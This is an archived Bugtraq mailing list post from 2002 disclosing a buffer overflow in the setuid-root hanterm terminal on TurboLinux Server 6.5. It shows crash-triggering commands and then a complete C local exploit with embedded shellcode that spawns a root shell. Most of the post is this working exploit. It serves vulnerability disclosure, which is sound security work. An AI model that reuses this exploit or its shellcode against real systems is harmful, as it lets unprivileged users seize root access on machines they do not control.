Home page logo
/

bugtraq logo Bugtraq mailing list archives

Overflow Vulnerabilities in hanterm
From: xperc <xperc () hotmail com>
Date: 7 Feb 2002 10:33:27 -0000



Hi,I'm xperc.

  hanterm is Hangul terminal for X. it is based on the 
xterm in XFree86. The hanterm binary is default 
installed with setuid root permissions for TurboLinux 
Server 6.5. but contains insecure code with allows 
unprivileged local users to obtain root access on the 
local system.

$which hanterm
/usr/bin/X11/hanterm
$ls -l /usr/bin/X11/hanterm
-rws--x--x      1       root    root 166100  03 13 
2001 /usr/bin/X11/hanterm*
$rpm -qf /usr/bin/X11/hanterm
hanterm-xf-p18-3.3-6
$hanterm -fn `perl -e 'print "a"x100'`
Segmentation fault
$hanterm -hfb `perl -e 'print "a"x8000'`
Segmentation fault
$hanterm -hfn `perl -e 'print "a"x8000'`
Segmentation fault
...etc

/* hanterm_exp.c
 *
 * local exploit for hanterm
 *  .. tested in TurboLinux Server 6.5 (Japan)              
 *
 * thanks my Japanese friend kaju(kaijyu)
 * and Japanese hacker UNYUN.
 *
 *                  by xperc () hotmail com
 *                         2002/02/07
 */

#include <stdio.h>

#define NOP             0x90
#define MAXBUF          88
#define RETOFS          84
#define SHELL_OFS       22
#define ESP_OFS         -0xe38  

unsigned int get_esp()
{
        __asm__("mov %esp,%eax");
}

int main()
{
        static char shellcode[]={
            0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
            
0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
            0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
            
0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
            0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
            0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
            0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
        }; 
        unsigned int retadr;
        char buf[MAXBUF];
        int i;
        
        memset(buf,NOP,MAXBUF);

        retadr=get_esp()+ESP_OFS;
        printf("Jumping address = %p\n",retadr);

        for(i=RETOFS-32;i<RETOFS+32;i+=4){
                buf[i]  =retadr&0xff;
                buf[i+1]=(retadr>>8)&0xff;
                buf[i+2]=(retadr>>16)&0xff;
                buf[i+3]=(retadr>>24)&0xff;
        }
        strncpy(buf+SHELL_OFS,shellcode,strlen
(shellcode));
        //buf[MAXBUF-1]='\0';       faint!:-(
        execl("/usr/bin/X11/hanterm","hanterm","-
fn",buf,(char *)0);
}



  By Date           By Thread  

Current thread:
  • Overflow Vulnerabilities in hanterm xperc (Feb 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault